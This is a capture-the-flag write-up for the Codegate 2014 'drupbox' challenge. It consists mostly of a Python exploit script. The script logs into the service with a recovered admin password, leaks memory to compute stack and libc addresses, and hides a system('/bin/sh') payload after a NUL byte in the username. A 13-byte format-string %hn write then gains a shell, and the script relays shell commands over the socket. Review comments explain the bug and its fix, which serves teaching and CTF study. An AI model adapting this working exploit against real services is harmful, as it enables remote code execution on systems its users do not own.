CTF/2014

CODEGATE CTF 2014 - drupbox

pwn3r_45 2014. 4. 20. 15:20

Overview

Category : Pwnables

File :

drupbox

Summary : make chdir() fail, get the admin password, 13-byte format string bug (FSB)

Exploit

#!/usr/bin/python

from socket import *
from struct import pack,unpack

# Pack an integer as a 4-byte little-endian unsigned value ("<L").
p = lambda x:pack("<L",x)

# Plain TCP connection to the challenge service; the target here is a
# local instance listening on port 8887.
s = socket(AF_INET,SOCK_STREAM)
s.connect(("localhost",8887))

# Block until Enter is pressed before talking to the service
# (presumably a pause for attaching a debugger -- confirm).
raw_input()

# Menu choice "1", then the user name "admin" and its password.
# NOTE(review): the password is hard-coded here; per the write-up summary it
# was recovered from the service itself (the chdir() failure step), i.e. the
# credential was reachable by an unauthenticated client. That recovery step
# is not part of this script.
# Each reply is read with a single recv(1024), which assumes the whole
# prompt arrives in one segment.
print s.recv(1024)
s.send("1\n")
print s.recv(1024)
s.send("admin\n")
print s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
print s.recv(1024)
s.send("2\n")

# Menu choice "2" followed by the input "XXXX".
print s.recv(1024)
s.send("XXXX\n")

# The first reply is printed; the second one is kept in d and parsed below
# as raw little-endian 32-bit words.
# NOTE(review): presumably this reply discloses process memory (the script
# treats it as stack / library / binary pointers) -- which service feature
# produces it is not visible here.
print s.recv(1024)
d = s.recv(1024)

# Three 32-bit values are taken from fixed byte offsets of the reply and
# adjusted by constants to obtain a stack address, a library base and the
# base of the main binary. The constants are specific to the author's
# binary and library build; they are not derived in this script.
stack = unpack("<L",d[4:8])[0]+0xa4
lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000
code = unpack("<L",d[32:36])[0] - 0x1197

print hex(code)

# Addresses computed from the values above.
# system_addr: presumably the offset of system() in the target's libc -- confirm.
# system_arg: a stack location 0x38e below the computed stack value.
# read_plt and pppr are computed but never referenced again in this script.
system_addr = lib+0x41260
system_arg = stack - 0x38e
read_plt = code + 0xbd0
pppr = code + 0xf47

print hex(stack)
print hex(lib)
# Second manual pause; the computed addresses are printed just above.
raw_input(">value")

# Low 16 bits of the computed stack value, minus 4, minus 926. This number is
# used further down as the "%<num>c" padding width, so it becomes the 16-bit
# value written by the %hn directive.
# NOTE(review): 926 presumably compensates for a fixed distance or for bytes
# the service prints before the directive -- confirm against the binary.
num =  ((stack&0x0000ffff) - 4)-926

# 12 bytes: packed system_addr, 4 filler bytes, packed system_arg
# (laid out like a function address / return slot / first argument triple).
payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)

# Menu choice "4", then choice "1" again to reach the user-name prompt.
s.send("4\n")
s.recv(1024)

s.send("1\n")

# User name: "admin", a NUL byte, the 12-byte payload, four NUL bytes and
# the string "/bin/sh".
# NOTE(review): presumably the service checks the name as a C string, so
# everything after the first NUL is ignored by the check but remains in the
# input buffer -- confirm. A service that validated the full received length
# would reject this input.
s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n")

s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")

s.recv(1024)
s.send("5\n")

# The input for menu choice "5" is a format string: "%<num>c" emits num
# characters and "%12$hn" stores that count as a 16-bit value through the
# 12th variadic argument. With num at most five digits the string is at most
# 13 bytes, matching the "13-byte" figure in the summary.
# This only has an effect if the service passes client-supplied text as the
# format argument of a printf-family call. The fix on the service side is a
# constant format string (e.g. printf("%s", buf)); -Wformat-security flags
# the pattern at build time and glibc's _FORTIFY_SOURCE=2 rejects %n in a
# writable format string at run time.
s.recv(1024)
s.send("%"+str(num)+"c%12$hn")

# Manual pause, then read the reply to the format-string input.
raw_input(">")
s.recv(1024)

# Line-based relay: every line typed at the "$" prompt is sent to the service
# with a trailing newline and one reply of up to 1024 bytes is printed.
# Typing "exit" ends the loop without sending anything.
# A single recv(1024) per line means longer output can be truncated or show
# up after the next command.
for comm in iter(lambda: raw_input("$"), "exit"):
    s.send(comm+"\n")
    print s.recv(1024)